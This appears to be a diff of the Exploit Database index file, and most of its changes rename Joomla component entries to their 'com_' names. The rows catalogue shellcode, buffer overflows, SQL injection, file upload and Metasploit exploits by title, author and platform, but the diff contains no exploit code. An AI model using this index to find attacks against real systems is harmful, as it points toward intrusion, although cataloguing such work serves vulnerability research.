 36603,platforms/windows/remote/36603.html,"WebGate eDVR Manager 2.6.4 - AudioOnlySiteChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
@@ -33812,7 +33812,7 @@ id,file,description,date,author,platform,type,port
 37361,platforms/php/webapps/37361.txt,"WordPress Plugin Huge-IT Slider 2.7.5 - Multiple Vulnerabilities",2015-06-24,"i0akiN SEC-LABORATORY",php,webapps,0
 37362,platforms/lin_x86-64/shellcode/37362.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes)",2015-06-24,"Bill Borskey",lin_x86-64,shellcode,0
 37363,platforms/php/webapps/37363.txt,"GeniXCMS 0.0.3 - register.php SQL Injection",2015-06-24,cfreer,php,webapps,80
-37364,platforms/php/webapps/37364.txt,"Joomla! Component SimpleImageUpload - Arbitrary File Upload",2015-06-24,CrashBandicot,php,webapps,80
+37364,platforms/php/webapps/37364.txt,"Joomla! Component 'com_simpleimageupload' - Arbitrary File Upload",2015-06-24,CrashBandicot,php,webapps,80
 37365,platforms/lin_x86/shellcode/37365.c,"Linux/x86 - Download & Execute Shellcode",2015-06-24,B3mB4m,lin_x86,shellcode,0
 37366,platforms/lin_x86/shellcode/37366.c,"Linux/x86 - Reboot Shellcode (28 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0
 37367,platforms/windows/local/37367.rb,"Microsoft Windows - ClientCopyImage Win32k Exploit (Metasploit)",2015-06-24,Metasploit,windows,local,0
@@ -34051,7 +34051,7 @@ id,file,description,date,author,platform,type,port
 37616,platforms/php/webapps/37616.txt,"PBBoard - admin.php xml_name Parameter Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0
 37617,platforms/php/webapps/37617.txt,"dirLIST - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities",2012-08-08,L0n3ly-H34rT,php,webapps,0
 37664,platforms/win_x86/shellcode/37664.c,"Win32/XP SP3 (TR) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,win_x86,shellcode,0
-37620,platforms/php/webapps/37620.txt,"Joomla! Component DOCman - Multiple Vulnerabilities",2015-07-15,"Hugo Santiago",php,webapps,80
+37620,platforms/php/webapps/37620.txt,"Joomla! Component 'com_docman' - Multiple Vulnerabilities",2015-07-15,"Hugo Santiago",php,webapps,80
 37623,platforms/hardware/webapps/37623.txt,"15 TOTOLINK Router Models - Multiple Remote Code Execution Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0
 37624,platforms/hardware/webapps/37624.txt,"4 TOTOLINK Router Models - Cross-Site Request Forgery / Cross-Site Scripting",2015-07-16,"Pierre Kim",hardware,webapps,0
 37625,platforms/hardware/webapps/37625.txt,"4 TOTOLINK Router Models - Backdoor Credentials",2015-07-16,"Pierre Kim",hardware,webapps,0
@@ -34091,7 +34091,7 @@ id,file,description,date,author,platform,type,port
 37660,platforms/ios/dos/37660.txt,"Image Transfer IOS - Remote Crash (PoC)",2015-07-20,"Mohammad Reza Espargham",ios,dos,0
 37662,platforms/multiple/webapps/37662.txt,"AirDroid iOS / Android / Win 3.1.3 - Persistent Exploit",2015-07-20,Vulnerability-Lab,multiple,webapps,0
 37663,platforms/linux/dos/37663.txt,"TcpDump - rpki_rtr_pdu_print Out-of-Bounds Denial of Service",2015-07-20,"Luke Arntson",linux,dos,0
-37666,platforms/php/webapps/37666.txt,"Joomla! Plugin Helpdesk Pro < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",php,webapps,80
+37666,platforms/php/webapps/37666.txt,"Joomla! Component 'com_helpdeskpro' < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",php,webapps,80
 37667,platforms/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' - Arbitrary File Upload (Metasploit)",2015-07-21,Metasploit,java,remote,0
 37668,platforms/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Mohammad Reza Espargham",windows,remote,0
 37669,platforms/windows/dos/37669.pl,"Counter-Strike 1.6 - 'GameInfo' Query Reflection Denial of Service (PoC)",2015-07-22,"Todor Donev",windows,dos,0
@@ -34156,7 +34156,7 @@ id,file,description,date,author,platform,type,port
 37728,platforms/php/dos/37728.py,"OSSEC WUI 0.8 - Denial of Service",2015-08-07,"Milad Saber",php,dos,0
 37729,platforms/windows/remote/37729.py,"FileZilla Client 2.2.x - Buffer Overflow (SEH)",2015-08-07,ly0n,windows,remote,0
 37730,platforms/windows/local/37730.py,"Tomabo MP4 Player 3.11.3 - '.m3u' Buffer Overflow (SEH)",2015-08-07,"Saeid Atabaki",windows,local,0
-37731,platforms/windows/remote/37731.py,"PCMan FTP Server 2.0.7 - PUT Command Buffer Overflow",2015-08-07,"Jay Turla",windows,remote,21
+37731,platforms/windows/remote/37731.py,"PCMan FTP Server 2.0.7 - 'PUT' Command Buffer Overflow",2015-08-07,"Jay Turla",windows,remote,21
 37732,platforms/win_x86/local/37732.c,"Microsoft Windows XP SP3 x86 / 2003 SP2 (x86) - 'NDProxy' Privilege Escalation (MS14-002)",2015-08-07,"Tomislav Paskalev",win_x86,local,0
 37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-07,LiquidWorm,php,webapps,80
 37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80
@@ -34190,14 +34190,14 @@ id,file,description,date,author,platform,type,port
 37764,platforms/windows/dos/37764.html,"Microsoft Internet Explorer - CTreeNode::GetCascadedLang Use-After-Free (MS15-079)",2015-08-12,"Blue Frost Security GmbH",windows,dos,0
 37765,platforms/multiple/webapps/37765.txt,"Zend Framework 2.4.2 - XML eXternal Entity Injection (XXE) on PHP FPM",2015-08-13,"Dawid Golunski",multiple,webapps,0
 37766,platforms/multiple/dos/37766.py,"Google Chrome 43.0 - Certificate MIME Handling Integer Overflow",2015-08-13,"Paulos Yibelo",multiple,dos,0
-37767,platforms/multiple/webapps/37767.txt,"Joomla! Component Event Manager 2.1.4 - Multiple Vulnerabilities",2015-08-13,"Martino Sani",multiple,webapps,0
+37767,platforms/multiple/webapps/37767.txt,"Joomla! Component 'com_jem' 2.1.4 - Multiple Vulnerabilities",2015-08-13,"Martino Sani",multiple,webapps,0
 37768,platforms/windows/local/37768.txt,"Microsoft Windows 8.1 - DCOM DCE/RPC Local NTLM Reflection Privilege Escalation (MS15-076)",2015-08-13,monoxgas,windows,local,0
 37769,platforms/php/webapps/37769.txt,"Gkplugins Picasaweb - Download File",2015-08-15,"TMT zno",php,webapps,0
 37770,platforms/hardware/webapps/37770.txt,"TOTOLINK Routers - Backdoor and Remote Code Execution (PoC)",2015-08-15,MadMouse,hardware,webapps,0
 37771,platforms/windows/local/37771.py,"Microsoft HTML Help Compiler 4.74.8702.0 - SEH Based Overflow",2015-08-15,St0rn,windows,local,0
 37772,platforms/multiple/local/37772.js,"Mozilla Firefox < 39.03 - 'pdf.js' Same Origin Policy Exploit",2015-08-15,"Tantaryu MING",multiple,local,0
-37773,platforms/php/webapps/37773.txt,"Joomla! Component com_memorix - SQL Injection",2015-08-15,"BM Cloudx",php,webapps,0
-37774,platforms/php/webapps/37774.txt,"Joomla! Component com_informations - SQL Injection",2015-08-15,"BM Cloudx",php,webapps,0
+37773,platforms/php/webapps/37773.txt,"Joomla! Component 'com_memorix' - SQL Injection",2015-08-15,"BM Cloudx",php,webapps,0
+37774,platforms/php/webapps/37774.txt,"Joomla! Component 'com_informations' - SQL Injection",2015-08-15,"BM Cloudx",php,webapps,0
 37775,platforms/windows/dos/37775.py,"Ability FTP Server 2.1.4 - afsmain.exe USER Command Remote Denial of Service",2015-08-15,St0rn,windows,dos,0
 37776,platforms/windows/dos/37776.py,"Ability FTP Server 2.1.4 - Admin Panel AUTHCODE Command Remote Denial of Service",2015-08-15,St0rn,windows,dos,0
 37777,platforms/linux/dos/37777.txt,"NetKit FTP Client (Ubuntu 14.04) - Crash/Denial of Service (PoC)",2015-08-15,"TUNISIAN CYBER",linux,dos,0
@@ -34411,7 +34411,7 @@ id,file,description,date,author,platform,type,port
 37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross-Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0
 38000,platforms/php/webapps/38000.txt,"Wolf CMS - Arbitrary File Upload / Execution",2015-08-28,"Narendra Bhati",php,webapps,80
 38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80
-38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - GET Command Buffer Overflow",2015-08-29,Koby,windows,remote,21
+38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - 'GET' Command Buffer Overflow",2015-08-29,Koby,windows,remote,21
 38004,platforms/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80
 38005,platforms/windows/remote/38005.asp,"MS SQL Server 2000/2005 - SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer Exploit",2015-08-29,ylbhz,windows,remote,0
 38006,platforms/php/webapps/38006.txt,"BloofoxCMS 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-10-31,"Canberk BOLAT",php,webapps,0
@@ -34421,7 +34421,7 @@ id,file,description,date,author,platform,type,port
 38010,platforms/php/webapps/38010.txt,"VeriCentre - Multiple SQL Injections",2012-11-06,"Cory Eubanks",php,webapps,0
 38011,platforms/php/webapps/38011.txt,"OrangeHRM - 'sortField' Parameter SQL Injection",2012-11-07,"High-Tech Bridge",php,webapps,0
 38012,platforms/php/webapps/38012.txt,"WordPress Plugin FLV Player - 'id' Parameter SQL Injection",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0
-38013,platforms/windows/remote/38013.py,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow",2015-08-29,Koby,windows,remote,21
+38013,platforms/windows/remote/38013.py,"PCMan FTP Server 2.0.7 - 'RENAME' Command Buffer Overflow",2015-08-29,Koby,windows,remote,21
 38014,platforms/windows/dos/38014.py,"Sysax Multi Server 6.40 - SSH Component Denial of Service",2015-08-29,3unnym00n,windows,dos,22
 38015,platforms/php/webapps/38015.txt,"AR Web Content Manager - (AWCM) cookie_gen.php Arbitrary Cookie Generation",2012-11-08,"Sooel Son",php,webapps,0
 38016,platforms/multiple/webapps/38016.txt,"ESRI ArcGIS for Server - 'where' Form Field SQL Injection",2012-11-09,anonymous,multiple,webapps,0
@@ -34825,7 +34825,7 @@ id,file,description,date,author,platform,type,port
 38442,platforms/php/dos/38442.txt,"PHPMyLicense 3.0.0 < 3.1.4 - Denial of Service",2015-10-11,"Aria Akhavan Rezayat",php,dos,0
 38443,platforms/php/webapps/38443.txt,"Liferay 6.1.0 CE - Privilege Escalation",2015-10-11,"Massimo De Luca",php,webapps,0
 38444,platforms/win_x86/dos/38444.py,"Tomabo MP4 Converter 3.10.12 < 3.11.12 - '.m3u' Denial of service (Crush Application)",2015-10-11,"mohammed Mohammed",win_x86,dos,0
-38445,platforms/php/webapps/38445.txt,"Joomla! Component Real Estate Manager 3.7 - SQL Injection",2015-10-11,"Omer Ramić",php,webapps,0
+38445,platforms/php/webapps/38445.txt,"Joomla! Component 'com_realestatemanager' 3.7 - SQL Injection",2015-10-11,"Omer Ramić",php,webapps,0
 38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - Cross-Site Request Forgery (Add Extension) / Arbitrary File Upload / PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0
 38448,platforms/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - Directory Traversal",2015-10-13,"Karn Ganeshen",hardware,webapps,0
 38449,platforms/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0
@@ -34902,8 +34902,8 @@ id,file,description,date,author,platform,type,port
 38524,platforms/php/webapps/38524.pl,"Matterdaddy Market - Multiple Security Vulnerabilities",2013-05-24,KedAns-Dz,php,webapps,0
 38525,platforms/php/webapps/38525.txt,"Subrion 3.X.x - Multiple Vulnerabilities",2015-10-23,bRpsd,php,webapps,0
 38526,platforms/windows/remote/38526.py,"Easy File Sharing Web Server 7.2 - Remote SEH Based Overflow",2015-10-23,Audit0r,windows,remote,0
-38527,platforms/php/webapps/38527.txt,"Joomla! Extension Realtyna RPL 8.9.2 - Multiple SQL Injections",2015-10-23,"Bikramaditya Guha",php,webapps,0
-38528,platforms/php/webapps/38528.txt,"Joomla! Extension Realtyna RPL 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2015-10-23,"Bikramaditya Guha",php,webapps,0
+38527,platforms/php/webapps/38527.txt,"Joomla! Component 'com_rpl' 8.9.2 - Multiple SQL Injections",2015-10-23,"Bikramaditya Guha",php,webapps,0
+38528,platforms/php/webapps/38528.txt,"Joomla! Component 'com_rpl' 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2015-10-23,"Bikramaditya Guha",php,webapps,0
 38572,platforms/php/webapps/38572.txt,"PHP Server Monitor 3.1.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-10-30,hyp3rlinx,php,webapps,0
 38532,platforms/windows/local/38532.py,"Alreader 2.5 .fb2 - SEH Based Stack Overflow (ASLR + DEP Bypass)",2015-10-25,g00dv1n,windows,local,0
 38533,platforms/windows/local/38533.c,"Microsoft Windows 10 - pcap Driver Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0
@@ -34935,7 +34935,7 @@ id,file,description,date,author,platform,type,port
 38562,platforms/php/webapps/38562.txt,"HP Insight Diagnostics - Remote Code Injection",2013-06-10,"Markus Wulftange",php,webapps,0
 38563,platforms/php/webapps/38563.txt,"HP Insight Diagnostics 9.4.0.4710 - Local File Inclusion",2013-06-10,"Markus Wulftange",php,webapps,0
 38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field SEH Overflow Crash (PoC)",2015-10-29,"Luis Martínez",windows,dos,0
-38565,platforms/php/webapps/38565.txt,"Joomla! Component JNews (com_jnews) 8.5.1 - SQL Injection",2015-10-29,"Omer Ramić",php,webapps,80
+38565,platforms/php/webapps/38565.txt,"Joomla! Component 'com_jnews' 8.5.1 - SQL Injection",2015-10-29,"Omer Ramić",php,webapps,80
 38566,platforms/hardware/dos/38566.py,"NetUSB - Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",hardware,dos,0
 38567,platforms/php/webapps/38567.txt,"Max Forum - Multiple Security Vulnerabilities",2013-06-09,"CWH Underground",php,webapps,0
 38568,platforms/php/webapps/38568.txt,"WordPress Theme Ambience - 'src' Parameter Cross-Site Scripting",2013-06-09,Darksnipper,php,webapps,0
@@ -35001,7 +35001,7 @@ id,file,description,date,author,platform,type,port
 38627,platforms/android/remote/38627.sh,"Google Android - 'APK' code Remote Security Bypass",2013-07-03,"Bluebox Security",android,remote,0
 38628,platforms/php/webapps/38628.txt,"HostBill - 'cpupdate.php' Authentication Bypass",2013-05-29,localhost.re,php,webapps,0
 38629,platforms/php/webapps/38629.txt,"vBulletin 5.1.x - Unauthenticated Remote Code Execution",2015-11-05,hhjj,php,webapps,0
-38642,platforms/php/webapps/38642.txt,"Serendipity 1.6.2 - 'serendipity_admin_image_selector.php' Cross-Site Scripting",2013-07-12,"Omar Kurt",php,webapps,0
+38642,platforms/php/webapps/38642.txt,"S9Y Serendipity 1.6.2 - 'serendipity_admin_image_selector.php' Cross-Site Scripting",2013-07-12,"Omar Kurt",php,webapps,0
 38633,platforms/multiple/remote/38633.pl,"Intelligent Platform Management Interface - Information Disclosure",2013-07-02,"Dan Farmer",multiple,remote,0
 38634,platforms/ios/remote/38634.txt,"Air Drive Plus - Multiple Input Validation Vulnerabilities",2013-07-09,"Benjamin Kunz Mejri",ios,remote,0
 38635,platforms/php/webapps/38635.txt,"iVote - 'details.php' SQL Injection",2013-07-10,"Ashiyane Digital Security Team",php,webapps,0
@@ -35140,7 +35140,7 @@ id,file,description,date,author,platform,type,port
 38782,platforms/php/webapps/38782.php,"WordPress Plugin SEO Watcher - 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-03,wantexz,php,webapps,0
 38775,platforms/linux/local/38775.rb,"Chkrootkit - Privilege Escalation (Metasploit)",2015-11-20,Metasploit,linux,local,0
 38776,platforms/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",cgi,webapps,0
-38777,platforms/php/webapps/38777.txt,"Joomla! Component JVideoClip - 'uid' Parameter SQL Injection",2013-09-21,SixP4ck3r,php,webapps,0
+38777,platforms/php/webapps/38777.txt,"Joomla! Component 'com_jvideoclip' - 'uid' Parameter SQL Injection",2013-09-21,SixP4ck3r,php,webapps,0
 38778,platforms/linux/dos/38778.txt,"Blue Coat ProxySG 5.x - and Security Gateway OS Denial Of Service",2013-09-23,anonymous,linux,dos,0
 38779,platforms/multiple/dos/38779.py,"Abuse HTTP Server - Remote Denial of Service",2013-09-30,"Zico Ekel",multiple,dos,0
 38780,platforms/php/webapps/38780.txt,"Silverstripe CMS - Multiple HTML Injection Vulnerabilities",2013-09-23,"Benjamin Kunz Mejri",php,webapps,0
@@ -35158,7 +35158,7 @@ id,file,description,date,author,platform,type,port
 38794,platforms/windows/dos/38794.txt,"Microsoft Windows Cursor - Object Potential Memory Leak (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0
 38795,platforms/windows/dos/38795.txt,"Microsoft Windows - Race Condition DestroySMWP Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0
 38796,platforms/windows/dos/38796.txt,"Microsoft Windows - Kernel Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0
-38797,platforms/php/remote/38797.rb,"Joomla! Component Content History - SQL Injection / Remote Code Execution (Metasploit)",2015-11-23,Metasploit,php,remote,80
+38797,platforms/php/remote/38797.rb,"Joomla! Component 'com_contenthistory' - SQL Injection / Remote Code Execution (Metasploit)",2015-11-23,Metasploit,php,remote,80
 38798,platforms/multiple/dos/38798.txt,"Mozilla Firefox - Cookie Verification Denial of Service",2013-04-04,anonymous,multiple,dos,0
 38799,platforms/php/webapps/38799.txt,"Bilboplanet - 'auth.php' SQL Injection",2013-10-11,"Omar Kurt",php,webapps,0
 38800,platforms/php/webapps/38800.txt,"FreeSMS - pages/crc_handler.php scheduleid Parameter SQL Injection",2013-09-27,"Sarahma Security",php,webapps,0
@@ -35174,7 +35174,7 @@ id,file,description,date,author,platform,type,port
 38811,platforms/php/webapps/38811.txt,"WordPress Theme Daily Deal - Arbitrary File Upload",2013-10-23,DevilScreaM,php,webapps,0
 38812,platforms/multiple/remote/38812.txt,"DELL Quest One Password Manager - CAPTCHA Security Bypass",2011-10-21,"Johnny Bravo",multiple,remote,0
 38813,platforms/multiple/remote/38813.txt,"Apache Shindig - XML External Entity Information Disclosure",2013-10-21,"Kousuke Ebihara",multiple,remote,0
-38814,platforms/php/webapps/38814.php,"Joomla! Component Maian15 - 'name' Parameter Arbitrary File Upload",2013-10-20,SultanHaikal,php,webapps,0
+38814,platforms/php/webapps/38814.php,"Joomla! Component 'com_maian15' - 'name' Parameter Arbitrary File Upload",2013-10-20,SultanHaikal,php,webapps,0
 38815,platforms/lin_x86-64/shellcode/38815.c,"Linux/x86-64 - Polymorphic execve Shellcode (31 bytes)",2015-11-25,d4sh&r,lin_x86-64,shellcode,0
 38816,platforms/jsp/webapps/38816.html,"JReport - 'dealSchedules.jsp' Cross-Site Request Forgery",2013-10-25,"Poonam Singh",jsp,webapps,0
 38817,platforms/linux/local/38817.txt,"Poppler 0.14.3 - '/utils/pdfseparate.cc' Local Format String",2013-10-26,"Daniel Kahn Gillmor",linux,local,0
@@ -35296,7 +35296,7 @@ id,file,description,date,author,platform,type,port
 38940,platforms/multiple/dos/38940.c,"VideoLAN VLC Media Player 1.1.11 - '.EAC3' File Denial of Service",2012-03-14,"Dan Fosco",multiple,dos,0
 38941,platforms/php/webapps/38941.txt,"GoAutoDial CE 3.3 - Multiple Vulnerabilities",2015-12-12,R-73eN,php,webapps,0
 38942,platforms/php/webapps/38942.txt,"SPAMINA Cloud Email Firewall - Directory Traversal",2013-10-03,"Sisco Barrera",php,webapps,0
-38943,platforms/php/webapps/38943.txt,"Joomla! Component Aclsfgpl - 'index.php' Arbitrary File Upload",2014-01-07,"TUNISIAN CYBER",php,webapps,0
+38943,platforms/php/webapps/38943.txt,"Joomla! Component 'com_aclsfgpl' - 'index.php' Arbitrary File Upload",2014-01-07,"TUNISIAN CYBER",php,webapps,0
 38944,platforms/php/webapps/38944.txt,"Command School Student Management System - /sw/admin_grades.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
 38945,platforms/php/webapps/38945.txt,"Command School Student Management System - /sw/admin_terms.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
 38946,platforms/php/webapps/38946.txt,"Command School Student Management System - /sw/admin_school_years.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
@@ -35317,7 +35317,7 @@ id,file,description,date,author,platform,type,port
 38966,platforms/php/webapps/38966.txt,"WordPress Plugin Admin Management Xtended 2.4.0 - Privilege escalation",2015-12-14,"Kacper Szurek",php,webapps,80
 39096,platforms/php/webapps/39096.txt,"i-doit Pro - 'objID' Parameter SQL Injection",2014-02-17,"Stephan Rickauer",php,webapps,0
 39097,platforms/linux/remote/39097.txt,"Red Hat Piranha - Remote Security Bypass",2013-12-11,"Andreas Schiermeier",linux,remote,0
-39098,platforms/php/webapps/39098.txt,"Joomla! Component Wire Immogest - 'index.php' SQL Injection",2014-02-17,MR.XpR,php,webapps,0
+39098,platforms/php/webapps/39098.txt,"Joomla! Component 'com_wire_immogest' - 'index.php' SQL Injection",2014-02-17,MR.XpR,php,webapps,0
 39057,platforms/php/webapps/39057.txt,"Dell Kace 1000 Systems Management Appliance DS-2014-001 - Multiple SQL Injections",2014-01-13,"Rohan Stelling",php,webapps,0
 38964,platforms/hardware/remote/38964.rb,"Siemens Simatic S7 1200 - CPU Command Module (Metasploit)",2015-12-14,"Nguyen Manh Hung",hardware,remote,102
 39095,platforms/php/dos/39095.pl,"MyBB 1.6.12 - 'misc.php' Remote Denial of Service",2014-02-12,Amir,php,dos,0
@@ -35368,7 +35368,7 @@ id,file,description,date,author,platform,type,port
 39013,platforms/php/webapps/39013.html,"Built2Go PHP Shopping - Cross-Site Request Forgery (Admin Password)",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0
 39014,platforms/php/webapps/39014.txt,"EZGenerator - Local File Disclosure / Cross-Site Request Forgery",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0
 39015,platforms/php/webapps/39015.txt,"Atmail Webmail Server - Email Body HTML Injection",2014-01-14,"Zhao Liang",php,webapps,0
-39016,platforms/php/webapps/39016.txt,"Joomla! Component Almond Classifieds - Arbitrary File Upload",2014-01-10,DevilScreaM,php,webapps,0
+39016,platforms/php/webapps/39016.txt,"Joomla! Component 'com_aclassfb' - Arbitrary File Upload",2014-01-10,DevilScreaM,php,webapps,0
 39017,platforms/php/webapps/39017.txt,"Zen Cart 1.5.4 - Local File Inclusion",2015-12-17,"High-Tech Bridge SA",php,webapps,80
 39018,platforms/multiple/remote/39018.txt,"Oracle Supply Chain Products Suite - Remote Security",2014-01-14,Oracle,multiple,remote,0
 39019,platforms/windows/dos/39019.txt,"Adobe Flash TextField.antiAliasType Setter - Use-After-Free",2015-12-17,"Google Security Research",windows,dos,0
@@ -35380,12 +35380,12 @@ id,file,description,date,author,platform,type,port
 39025,platforms/windows/dos/39025.txt,"Microsoft Windows Kernel win32k!OffsetChildren - Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0
 39026,platforms/win_x86/dos/39026.txt,"win32k Desktop and Clipboard - Null Pointer Dereference",2015-12-17,"Nils Sommer",win_x86,dos,0
 39027,platforms/win_x86/dos/39027.txt,"win32k Clipboard Bitmap - Use-After-Free",2015-12-17,"Nils Sommer",win_x86,dos,0
-39028,platforms/php/webapps/39028.txt,"Joomla! Extension Sexy Polling - 'answer_id' Parameter SQL Injection",2014-01-16,"High-Tech Bridge",php,webapps,0
+39028,platforms/php/webapps/39028.txt,"Joomla! Component 'com_sexypolling' - 'answer_id' Parameter SQL Injection",2014-01-16,"High-Tech Bridge",php,webapps,0
 39029,platforms/php/webapps/39029.txt,"BloofoxCMS - /bloofox/index.php 'Username' Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
 39030,platforms/php/webapps/39030.txt,"BloofoxCMS - /bloofox/admin/index.php 'Username' Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
 39031,platforms/php/webapps/39031.html,"BloofoxCMS - /admin/index.php Cross-Site Request Forgery (Add Admin)",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
 39032,platforms/php/webapps/39032.txt,"BloofoxCMS 0.5.0 - 'fileurl' Parameter Local File Inclusion",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
-39033,platforms/php/webapps/39033.py,"Joomla! 1.5 < 3.4.5 - Object Injection x-forwarded-for Header Remote Code Execution",2015-12-18,"Andrew McNicol",php,webapps,80
+39033,platforms/php/webapps/39033.py,"Joomla! 1.5 < 3.4.5 - Object Injection 'x-forwarded-for' Header Remote Code Execution",2015-12-18,"Andrew McNicol",php,webapps,80
 39034,platforms/php/webapps/39034.html,"Ovidentia maillist Module 4.0 - Remote File Inclusion",2015-12-18,bd0rk,php,webapps,80
 39035,platforms/win_x86-64/local/39035.txt,"Microsoft Windows 8.1 - 'win32k' Privilege Escalation (MS15-010)",2015-12-18,"Jean-Jamil Khalife",win_x86-64,local,0
 39099,platforms/php/webapps/39099.txt,"Rhino - Cross-Site Scripting / Password Reset Security Bypass Vulnerabilities",2014-02-12,Slotleet,php,webapps,0
@@ -35439,7 +35439,7 @@ id,file,description,date,author,platform,type,port
 39085,platforms/php/webapps/39085.txt,"Arastta 1.1.5 - SQL Injection",2015-12-23,"Curesec Research Team",php,webapps,80
 39086,platforms/php/webapps/39086.txt,"PhpSocial 2.0.0304_20222226 - Cross-Site Request Forgery",2015-12-23,"Curesec Research Team",php,webapps,80
 39087,platforms/php/webapps/39087.txt,"Singapore 0.9.9b Beta - Image Gallery Remote File Inclusion / Cross-Site Scripting",2014-02-05,"TUNISIAN CYBER",php,webapps,0
-39088,platforms/php/webapps/39088.txt,"Joomla! Plugin Projoom NovaSFH - 'upload.php' Arbitrary File Upload",2013-12-13,"Yuri Kramarz",php,webapps,0
+39088,platforms/php/webapps/39088.txt,"Joomla! Component 'com_novasfh' - 'upload.php' Arbitrary File Upload",2013-12-13,"Yuri Kramarz",php,webapps,0
 39089,platforms/hardware/remote/39089.txt,"Netgear D6300B - /diag.cgi IPAddr4 Parameter Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote,0
 39090,platforms/php/webapps/39090.php,"WordPress Theme Kiddo - Arbitrary File Upload",2014-02-05,"TUNISIAN CYBER",php,webapps,0
 39091,platforms/php/dos/39091.pl,"WHMCS 5.12 - 'cart.php' Denial of Service",2014-02-07,Amir,php,dos,0
@@ -35483,7 +35483,7 @@ id,file,description,date,author,platform,type,port
 39137,platforms/cgi/webapps/39137.txt,"Primo Interactive CMS - 'pcm.cgi' Remote Command Execution",2014-03-31,"Felipe Andrian Peixoto",cgi,webapps,0
 39138,platforms/hardware/remote/39138.html,"ICOMM 610 Wireless Modem - Cross-Site Request Forgery",2014-04-12,"Blessen Thomas",hardware,remote,0
 39139,platforms/php/webapps/39139.txt,"PHPFox - Access Control Security Bypass",2014-04-05,"Wesley Henrique",php,webapps,0
-39140,platforms/php/webapps/39140.txt,"Joomla! Component Inneradmission - 'index.php' SQL Injection",2014-04-08,Lazmania61,php,webapps,0
+39140,platforms/php/webapps/39140.txt,"Joomla! Component 'com_inneradmission' - 'index.php' SQL Injection",2014-04-08,Lazmania61,php,webapps,0
 39141,platforms/php/webapps/39141.txt,"eazyCMS - 'index.php' SQL Injection",2014-04-09,Renzi,php,webapps,0
 39142,platforms/jsp/webapps/39142.txt,"Xangati - /servlet/MGConfigData Multiple Parameter Directory Traversal",2014-04-14,"Jan Kadijk",jsp,webapps,0
 39143,platforms/jsp/webapps/39143.txt,"Xangati - /servlet/Installer file Parameter Directory Traversal",2014-04-14,"Jan Kadijk",jsp,webapps,0
@@ -35633,7 +35633,7 @@ id,file,description,date,author,platform,type,port
 39292,platforms/multiple/remote/39292.pl,"Granding MA300 - Traffic Sniffing MitM Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",multiple,remote,0
 40337,platforms/windows/local/40337.py,"MySQL 5.5.45 (x64) - Local Credentials Disclosure",2016-09-05,"Yakir Wizman",windows,local,0
 39293,platforms/multiple/remote/39293.pl,"Granding MA300 - Weak Pin Encryption Brute Force",2014-08-26,"Eric Sesterhenn",multiple,remote,0
-39294,platforms/php/webapps/39294.txt,"Joomla! Extension Spider Video Player - 'theme' Parameter SQL Injection",2014-08-26,"Claudio Viviani",php,webapps,0
+39294,platforms/php/webapps/39294.txt,"Joomla! Component 'spidervideoplayer' - 'theme' Parameter SQL Injection",2014-08-26,"Claudio Viviani",php,webapps,0
